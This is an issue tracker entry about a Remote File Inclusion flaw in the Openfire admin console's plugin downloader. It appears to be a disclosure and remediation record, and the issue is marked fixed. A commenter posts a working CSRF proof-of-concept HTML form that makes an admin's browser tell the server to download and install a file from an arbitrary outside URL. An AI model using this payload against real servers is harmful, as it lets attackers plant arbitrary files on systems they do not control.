Admin Console Remote File Inclusion (RFI) Vulnerability

Description

hyp3rlinx reported that Openfire v3.10.2 suffers from a Remote File Inclusion (RFI) vulnerability.

Full details: https://packetstormsecurity.com/files/133560/Openfire-3.10.2-Remote-File-Inclusion.html

Vulnerability Details:
In "available-plugins.jsp" there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet.

On line 40: all that needs to be satisfied is that the paramater is not null.

If the above condition check returns true, the application downloads whatever file you give it.
line 54:

Exploit code(s):
1) Download arbitrary file, e.g.

Our RFI will then be downloaded to the "openfire\plugins" directory.

Environment

None

Activity

Show:
Tim Durden
January 4, 2016, 5:36 PM
Edited

Re-tested this on the latest Openfire 4.0.0 beta and still present.

Simon Waters
December 16, 2016, 3:38 PM

Re-tested this is still present in 4.1 beta

Simon Waters
December 16, 2016, 4:01 PM

Noted there is no CSRF on this, so the download of a file to server can be initiated via CSRF against the admins browser.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/dwr/exec/downloader.installPlugin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1&#10;c0&#45;scriptName&#61;downloader&#10;c0&#45;methodName&#61;installPlugin&#10;c0&#45;id&#61;576&#95;1481902916818&#10;c0&#45;param0&#61;string&#58;https&#37;3A&#37;2F&#37;2Fdownload&#46;microsoft&#46;com&#37;2Fdownload&#37;2F4&#37;2F4&#37;2F9&#37;2F449b0038&#45;ac27&#45;4b24&#45;bf11&#45;dd8ebdf5cca6&#37;2Fsonar&#95;setup&#46;exe&#10;c0&#45;param1&#61;string&#58;1164973806&#10;xml&#61;true&#10;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Fixed

Assignee

Dave Cridland

Reporter

Tim Durden

Expected Effort

None

Ignite Forum URL

None

Components

Fix versions

Affects versions

Priority

Major
Configure